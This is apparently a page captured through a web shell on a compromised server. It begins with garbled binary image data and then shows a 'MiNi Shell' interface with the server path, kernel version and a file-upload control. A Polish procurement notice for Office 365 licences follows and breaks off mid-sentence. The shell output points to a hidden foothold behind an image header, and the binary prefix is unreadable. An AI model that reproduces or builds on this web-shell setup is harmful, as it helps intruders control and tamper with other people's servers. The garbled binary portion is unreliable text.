JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/thread-self/root/home/vmanager/www/common/web/tenders/20250804/

Linux 9dbcd5f6333d 5.15.0-153-generic #163-Ubuntu SMP Thu Aug 7 16:37:18 UTC 2025 x86_64
Upload File :
Current File : //proc/thread-self/root/home/vmanager/www/common/web/tenders/20250804/0036035501-N-2025.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Dostawy<br/> Dostawa licencji na oprogramowanie biurowe Microsoft Office 365 E3 oraz Microsoft Office Business Basic dla Instytucji rządowych (Government) lub oprogramowanie równoważne. </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Polski Instytut Sztuki Filmowej</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 140214847</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Kruczkowskiego 2</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Warszawa</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">00-412</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">mazowieckie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL911 - Miasto Warszawa</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">22106462</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">pisf@pisf.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">https://pisf.pl/</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - inne państwowe i samorządowe osoby prawne utworzone na podstawie odrębnych ustaw w celu wykonywania zadań publicznych</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Inna działalność</span> </h3> <p class="mb-0"> Kinematografia </p> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Dostawa licencji na oprogramowanie biurowe Microsoft Office 365 E3 oraz Microsoft Office Business Basic dla Instytucji rządowych (Government) lub oprogramowanie równoważne. </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-1174384d-26f9-4294-84bb-62d6c7281078</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2025/BZP 00360355</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2025-08-04</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2025/BZP 00084391/01/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.2.3 Dostawa licencji na oprogramowanie biurowe Microsoft Office 365 E3 oraz Microsoft Office Business Basic dla Instytucji rządowych.</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://platformazakupowa.pl/transakcja/1142696 <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://platformazakupowa.pl/pn/pisf</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1 Komunikacja w postępow. o udzielenie zamówienia w tym składanie ofert, wymiana informacji oraz przekazywanie dokumentów/oświadczeń między<br/>Zamawiającym a Wykonawcą, z uwzględnieniem wyjątków określonych w Ustawie p.z.p., odbywa się przy użyciu środków<br/>komunikacji elektronicznej. Przez środki komunikacji elektronicznej rozumie się środki komunik. elektronicznej zdefiniowane w ustawie z dn.18.07.2002r. o świadczeniu usług drogą elektroniczną (t.j.Dz.U. z 2024r. poz.1530 ze zm).<br/>2 Ofertę, oświadczenia, o których mowa w art. 125 ust. 1 Ustawy p.z.p., podmiotowe środki dowodowe, pełnomocnictwa,<br/>zobowiązanie podmiotu udostępniającego zasoby sporządza się w postaci elektronicznej, w ogólnie dostępnych formatach danych,<br/>w szczególności w formatach .txt, .rtf, .pdf, .doc, .docx, .odt.<br/>3 Ofertę, a także oświadczenie, o jakim mowa w pkt 13.2 SWZ składa się, pod rygorem nieważności, w formie elektronicznej lub w<br/>postaci elektronicznej opatrzonej podpisem zaufanym lub podpisem osobistym.<br/>4 Zawiadomienia, oświadczenia, wnioski lub informacje Wykonawcy przekazują przez Platformę, dostępną pod adresem:<br/>https://platformazakupowa.pl/pn/pisf .<br/>5 Wykonawca zamierzający wziąć udział w postępowaniu o udzielenie zamówienia publicznego, musi posiadać konto na Platformie<br/>Zakupowej. Zarejestrowanie i utrzymywanie konta na Platformie Zakupowej oraz korzystanie z Platformy jest bezpłatne.<br/>6 Zamawiający będzie przekazywał Wykonawcom informacje za pośrednictwem Platformy. Informacje dotyczące odpowiedzi na<br/>pytania, zmiany SWZ, zmiany terminu składania i otwarcia ofert Zamawiający będzie zamieszczał na Platformie. Korespondencja,<br/>której zgodnie z obowiązującymi przepisami adresatem jest konkretny Wykonawca, będzie przekazywana za pośrednictwem<br/>Platformy do konkretnego Wykonawcy.<br/>7 Wykonawca jako podmiot profesjonalny ma obowiązek sprawdzania komunikatów i wiadomości bezpośrednio na Platformie<br/>przesłanych przez Zamawiającego, gdyż system powiadomień może ulec awarii lub powiadomienie może trafić do folderu SPAM.<br/>8 Wymagania techniczne i organizacyjne wysyłania i odbierania dokumentów elektronicznych, elektronicznych kopii dokumentów i<br/>oświadczeń oraz informacji przekazywanych przy ich użyciu opisane zostały w Regulaminie Internetowej Platformy zakupowej<br/>platformazakupowa.pl Open Nexus Sp. z o.o. (https://platformazakupowa.pl/strona/1-regulamin)”.<br/>9 Wykonawca przystępując do postępowania o udzielenie zamówienia publicznego tj. bezpłatnie rejestrując się lub logując (w<br/>przypadku posiadania konta w Platformie Zakupowej), akceptuje warunki korzystania z Platformy, określone w Regulaminie oraz<br/>uznaje go za wiążący.<br/>10 Zamawiający podaje minimalne wymagania techniczne związane z korzystaniem z Platformy:<br/>1 łącze internetowe o przepustowości co najmniej 512 kbit/s;<br/>2 zainstalowana dowolna, inna przeglądarka internetowa niż Internet Explorer np., Chrome i FireFox w najnowszej wersji;<br/>3 włączona obsługa języka Javascript w przeglądarce internetowej;<br/>4 akceptacja plików typu „cookies” w przeglądarce internetowej.<br/>5 komputer klasy PC lub MAC o następującej konfiguracji: pamięć min. 2GB Ram, procesor Intel IV 2 GHZ lub jego nowsza wersja,<br/>jeden z systemów operacyjnych - MSWindows 7, MacOs x 10 4, Linux, lub ich nowsze wersje;<br/>6 zainstalowany program Adobe Acrobat Reader lub inny obsługujący format plików .pdf;<br/>7 Szyfrowanie na platformazakupowa.pl odbywa się za pomocą protokołu TLS 1.3;<br/>8 Oznaczenie czasu odbioru danych przez platformę zakupową stanowi datę oraz dokładny czas (hh:mm:ss) generowany wg. czasu<br/>lokalnego serwera synchronizowanego z zegarem Głównego Urzędu Miar.<br/>9 Wykonawca może zwrócić się do Zamawiającego z wnioskiem o wyjaśnienie treści SWZ.<br/>10. Oświadczenia lub dokumenty, o których mowa w Rozporządz. Ministra Rozwoju Pracy i Technologii z dn.23.12.2020r. w sprawie<br/>rodzajów podmiotowych środków dowodowych oraz innych dokumentów lub oświadczeń, jakich może żądać Zamawiający od<br/>wykonawcy<br/>Uwaga! Ciąg dalszy informacji w SEKCJI IX–POZOSTAŁE INFORMACJE</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">1. Administratorem Państwa danych osobowych jest Polski Instytut Sztuki Filmowej<br/>reprezentowany przez Dyrektora PISF ul. Leona Kruczkowskiego 2, 00-412 Warszawa; 2. Administrator wyznaczył Inspektora<br/>Danych Osobowych, adres e-mail: iodo@pisf.pl.<br/>3. Państwa dane osobowe przetwarzane będą na podstawie art. 6 ust. 1 lit. c RODO w celu:<br/>rozpatrzenia złożonej oferty;<br/>w celu zlecenia usług lub zamówieniem dostaw oraz ich realizacją.<br/>4. Podstawą prawną przetwarzania Pani/Pana danych osobowych jest w szczególności:<br/>Rozporządzenie Parlamentu Europejskiego i Rady(UE) 2016/679 z dn. 27.04. 2016r. w sprawie ochrony osób fizycznych w związku<br/>z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE, w tym:<br/>art.6 ust.1 lit.b) RODO w celu zawarcia i realizacji umowy/zlecenia usług/zamówienia dostaw;<br/>art.6 ust.1 lit.c) RODO w celu wypełnienia obowiązku prawnego ciążącego na Administratorze;<br/>art.6 ust.1 lit.f) RODO w celu właściwej realizacji usługi/dostawy, ochrony zasobów Administratora, ustalenia, dochodzenia roszczeń<br/>oraz obrony przez roszczeniami;<br/>-ustawa z dn.10.05.2018r. o ochronie danych osobowych;<br/>-ustawa z dn.11.09.2019r. Prawo zamówień publicznych;<br/>-ustawa z dn.23.04.1964r. Kodeks cywilny;<br/>-ustawa z dn.27.08.2009r. o finansach publicznych;<br/>-ustawa z dn.29.09.1994r. o rachunkowości;<br/>-ustawa z dn.6.09.2001r. o dostępie do informacji publicznej;<br/>-ustawa z dn.14.07.1983r. o narodowym zasobie archiwalnym i archiwach.<br/>5. Odbiorcą Państwa danych osobowych mogą być podmioty posiadające upoważnienie do przetwarzania danych osobowych na<br/>postawie przepisów prawa powszechnie obowiązującego (w tym ustawy z dn. 6.09.2001r. o dostępie do informacji publicznej). W<br/>uzasadnionych przypadkach dane osobowe zostaną przekazane podmiotom, z którymi Administrator Danych Osobowych zawarł<br/>umowę powierzenia przetwarzania danych osobowych m. in. podmiotom świadczącym usługi w zakresie systemów<br/>informatycznych/oprogramowania oraz operatorom pocztowym. Państwa dane osobowe będą udostępnione na wniosek osób lub<br/>podmiotów zgodnie z ustawą z dn.11.09.2019r. Prawo zamów. publiczn..<br/>6. Państwa dane osobowe nie będą przekazywane do państw trzecich poza obszar Unii Europejskiej.<br/>7. Państwa dane osobowe będą przechowywane, zgodnie z art. 78 ust. 1 Ustawy p.z.p. przez okres 4 lat od dnia zakończenia<br/>postępowania o udzielenie zamówienia, a jeżeli czas trwania umowy przekracza 4 lata, okres przechowywania obejmuje cały czas<br/>trwania umowy (art.78 ust.4 Ustawy p.z.p.);<br/>8. Obowiązek podania przez Państwa danych osobowych bezpośrednio dotyczących Państwa jest wymogiem określonym w<br/>przepisach Ustawy p.z.p., związanym z udziałem w niniejszym postępowaniu;<br/>9. W odniesieniu do Państwa danych osobowych decyzje nie będą podejmowane w sposób zautomatyzowany, stosownie do<br/>postanowień art.22 RODO;<br/>10. Posiadają Państwo:<br/>a) zgodnie z art.15 RODO - prawo dostępu do danych osobowych Państwa dotyczących (z zastrzeżeniem, że w sytuacji, gdy<br/>skorzystanie z tego prawa wymagałoby po stronie administratora niewspółmiernie dużego wysiłku, mogą Państwo zostać<br/>zobowiązani do wskazania dodatkowych informacji mających na celu sprecyzowanie żądania, w szczególności podania nazwy lub<br/>daty postępowania o udzielenie zamówienia publicznego albo sprecyzowania nazwy lub daty zakończonego postępowania o<br/>udzielenie zamówienia);<br/>b) zgodnie z art.16 RODO- prawo do sprostowania Państwa danych osobowych (z tym, że skorzystanie z prawa do sprostowania nie<br/>może skutkować zmianą wyniku postępowania o udzielenie zamówienia publicznego ani zmianą postanowień umowy w zakresie<br/>niezgodnym z Ustawą p.z.p. oraz nie może naruszać integralności protokołu z postępowania oraz załączników do niego);<br/>c) zgodnie z art.18 RODO-prawo żądania od administratora ograniczenia przetwarzania danych osobowych z zastrzeżeniem okresu<br/>trwania postępowania o udzielenie zamówienia publicznego lub konkursu oraz przypadków,<br/>Ciąg Dalszy inform. w 3.16.) RODO (ograniczenia stosowania)</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">Zamawiający informuje, iż w związku z art. 19 ust. 2 i 3 Ustawy p.z.p.:<br/>a) skorzystanie przez osobę, której dane osobowe dotyczą, z uprawnienia do sprostowania lub uzupełnienia, o którym mowa w art.<br/>16 RODO, nie może skutkować zmianą wyniku postępowania o udzielenie zamówienia ani zmianą postanowień umowy w sprawie<br/>zamówienia publicznego w zakresie niezgodnym z Ustawą;<br/>b) w postępowaniu o udzielenie zamówienia zgłoszenie żądania ograniczenia przetwarzania, o którym mowa w art. 18 ust. 1 RODO,<br/>nie ogranicza przetwarzania danych osobowych do czasu zakończenia tego postępowania.<br/><br/>C.D. zapisów z 3.15) RODO obowiązek informacyjny:<br/>.. o których mowa w art.18 ust. 2 RODO (prawo do ograniczenia przetwarzania nie ma zastosowania w odniesieniu do<br/>przechowywania, w celu zapewnienia korzystania ze środków ochrony prawnej lub w celu ochrony praw innej osoby fizycznej lub<br/>prawnej, lub z uwagi na ważne względy interesu publicznego U. E. lub państwa członkowskiego);<br/>d) prawo do wniesienia skargi do Prezesa UODO, gdy uznają Państwo, że przetwarzanie Państwa danych osobowych narusza<br/>przepisy RODO;<br/>11. Nie przysługuje Państwu:<br/>a) zgodnie z art.17 ust.3 lit. b, d lub e RODO- prawo do usunięcia danych osobowych;<br/>b) prawo do przenoszenia danych osobowych, o którym mowa w art. 20 RODO;<br/>c) zgodnie z art. 21 RODO prawo sprzeciwu, wobec przetwarzania danych.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">5/2025/DR</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Dostawy</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1.	Zamawiający wskazuje, że przedmiotem zamówienia jest dostawa nowych, wolnych od wad licencji na oprogramowanie Office 365 E3 oraz licencji na oprogramowanie Office 365 Business Basic lub równoważnych (kryteria równoważności są opisane w punkcie 2). <br/>2.	Zamawiający wymaga dostarczenia 135 sztuk licencji oprogramowania Office 365 E3 dla Instytucji rządowych oraz 90 sztuk licencji oprogramowania Office 365 Business Basic dla Instytucji rządowych.<br/>3.	Zamawiający nie może korzystać z licencji edukacyjnych, w związku z tym nie dopuszcza zaoferowania licencji edukacyjnych.<br/>4.	Okres ważności licencji wynosi 12 miesięcy – zgodnie z terminem dostawy i aktywacji określonym w umowie.<br/>5.	Licencje powinny współpracować z systemami operacyjnymi Windows 10/11.<br/>6.	Licencja umożliwia włączenie usługi szyfrowania poczty (AIP – Azure Information Protection). <br/>7.	Licencje muszą być przypisane do panelu administratora portal.office.com Polskiego Instytutu Sztuki Filmowej.<br/>8.	Licencje muszą pozwalać na swobodne przenoszenie oprogramowania pomiędzy stacjami roboczymi (np. w przypadku wymiany lub uszkodzenia sprzętu). Licencje powinny mieć możliwość zmiany użytkownika.<br/>9.	Licencje muszą zawierać prawo do uaktualniania wersji zakupionego oprogramowania będącego przedmiotem Zamówienia do najbardziej aktualnej dostępnej wersji w okresie trwania umowy. <br/>10.	Wymagania dotyczące wdrożenia oprogramowania:<br/>•	Poczty e-mail ze skrzynką pocztową o rozmiarze minimalnym 50 GB, <br/>•	Minimum 1 TB przestrzeni dyskowej w usłudze OneDrive do przechowywania i udostępniania plików,<br/>•	integracja z lokalnym Active Directory, <br/>•	możliwość synchronizacji z lokalnymi rozwiązaniami oprogramowania Microsoft np.: Microsoft Office 2013 i 2016 Standard.<br/><br/>Szczegółowy opis przedmiotu zamówienia zawarty został w Załączniku nr 2 do SWZ (Opis Przedmiotu Zamówienia) oraz w Projektowanych postanowieniach umowy stanowiących Załącznik nr 7 do SWZ. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">48000000-8 - Pakiety oprogramowania i systemy informatyczne</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">48218000-9 - Pakiety oprogramowania zarządzającego licencjami</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja do --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2025-10-13</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">16.1.1.	Punkty za kryterium „Cena brutto” (C):<br/><br/>1.1.Liczba punktów uzyskanych przez Wykonawcę w tym kryterium zostanie przeliczona z wykorzystaniem następującego wzoru i zaokrąglona do dwóch miejsc po przecinku:<br/><br/> Cmin<br/>C = ------------ x 100% x 100 <br/> Cwer<br/><br/>Gdzie:<br/>C – oznacza liczbę punktów, jakie otrzyma oferta badana za kryterium (C);<br/>Cmin – oznacza najniższą cenę jednostkową brutto spośród ważnych i nieodrzuconych ofert;<br/>Cwer – oznacza cenę jednostkową brutto oferty badanej.<br/>1.2.Ocena w tym kryterium jest dokonywana na podstawie oświadczenia Wykonawcy złożonego w ofercie.<br/>1.3. Maksymalna liczba punktów w tym kryterium wynosi 100. <br/><br/>16.2.	Obliczenia punktacji, we wskazanych kryteriach oceny ofert, zostaną dokonane z dokładnością do dwóch miejsc po przecinku.<br/>16.3.	Oferta, która otrzyma największą liczbę punktów w oparciu o określone kryteria, zostanie uznana za najkorzystniejszą. Pozostałe oferty zostaną sklasyfikowane zgodnie z liczbą otrzymanych punktów.<br/>16.4.	Jeżeli nie będzie można wybrać najkorzystniejszej oferty z uwagi na to, że dwie lub więcej ofert będą przedstawiać taki sam bilans ceny lub kosztu i innych kryteriów oceny ofert, Zamawiający wybierze spośród tych ofert ofertę, która otrzymała najwyższą ocenę w kryterium o najwyższej wadze.<br/>16.5.	Jeżeli oferty otrzymały taką samą ocenę w kryterium o najwyższej wadze, Zamawiający wybierze ofertę z najniższą ceną lub najniższym kosztem.<br/>16.6.	Jeżeli nie będzie można dokonać wyboru oferty w sposób, o którym mowa w pkt 16.6, Zamawiający wezwie Wykonawców, którzy złożyli te oferty, do złożenia w terminie określonym przez Zamawiającego ofert dodatkowych zawierających nową cenę lub koszt.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Procentowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Wyłącznie kryterium ceny </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">100</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 7.1.	O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy:<br/><br/>7.1.1.	nie podlegają wykluczeniu z postępowania oraz spełniają warunki udziału w postępowaniu.<br/>Ocena spełniania w/w warunku zostanie dokonana przez Zamawiającego na podstawie złożonego oświadczenia, o którym mowa w art. 125 ust. 1 Ustawy p.z.p., według wzoru stanowiącego Załącznik nr 3 do SWZ, według formuły spełnia / nie spełnia.<br/><br/>7.1.2.	spełniają warunki udziału w postępowaniu w zakresie:<br/><br/>a)	zdolności do występowania w obrocie gospodarczym;<br/><br/>Zamawiający nie określa warunku. <br/><br/>b)	uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, o ile wynika to z odrębnych przepisów;<br/><br/>Zamawiający nie określa warunku. <br/><br/>c)	sytuacji ekonomicznej lub finansowej;<br/><br/>Zamawiający nie określa warunku. <br/><br/>d)	zdolności technicznej lub zawodowej.<br/><br/>Zamawiający uzna ww. warunek za spełniony jeżeli Wykonawca wykaże, że wykonał należycie, a w przypadku świadczeń okresowych lub ciągłych również wykonuje, w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, co najmniej 3 (trzy) dostawy licencji na oprogramowanie biurowe dla użytkowników o łącznej wartości wykazanych dostaw co najmniej 200.000,00 złotych brutto (słownie: dwieście tysięcy złotych).<br/><br/>Uwaga nr 1<br/>W przypadku, gdy dane dostawy (umowy) obejmują swoim zakresem również inne elementy, poza wynikającymi z treści ww. warunku, 